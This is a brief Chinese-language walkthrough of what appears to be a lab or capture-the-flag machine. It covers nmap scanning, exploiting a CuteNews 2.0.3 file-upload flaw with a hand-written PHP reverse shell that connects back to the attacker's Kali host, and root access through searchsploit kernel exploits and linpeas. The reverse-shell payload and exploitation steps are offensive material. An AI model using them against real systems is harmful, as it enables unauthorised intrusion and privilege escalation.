主机发现

sudo nmap -sT --min-rate 10000 -p- xx.xx.xx.xx -oA nmapscan/ports

只有一个端口开放

sudo nmap -sT -sV -sC -O -p xx.xxx.xx.xx -oA nmapscan/detail

sudo nmap -sU --top-ports 20 xx.xx.xx.xx -oA nmapscan/udp

sudo nmap --script=vuln -p xx.xx.xx.xx -oA nmapscan/vuln

访问web页面,发现是cutenew2.0.3版本的cms

利用searchsploit cuteNews 2.0.3

下载

searchsploit cuteNew2.0.3 -m 37474

查看漏洞

手写一个反弹shell

sudo vim evill.php

<?php exec("/bin/ bash -c 'bash -i >& /dev/tcp/kali's ip/1234 0>&1'");?>

根据页面漏洞进行上传

shell在

kali监听访问php

拿到初始shell

权限查看

whoami　　 ip a 　　cd /home/　　查看home目录中的其他目录有没有什么文件　　

uname -a 　　sudo -l　　自动任务

什么都没有,尝试内核提权

searchsploit kernel 3.16.0-30

观察版本是否正确发现只有两个,尝试两个是否能成功提权

search kernel 3.16.0-30 -m 37292

sudo php -S 0:80 

在靶机上利用wget下载

查看利用方式并进行运行

失败

利用提权建议工具进行linpeas.sh

chmod +x linpeas.sh

通过给出的建议一个一个下载进行尝试

 最后在36746.c这个文件成功提权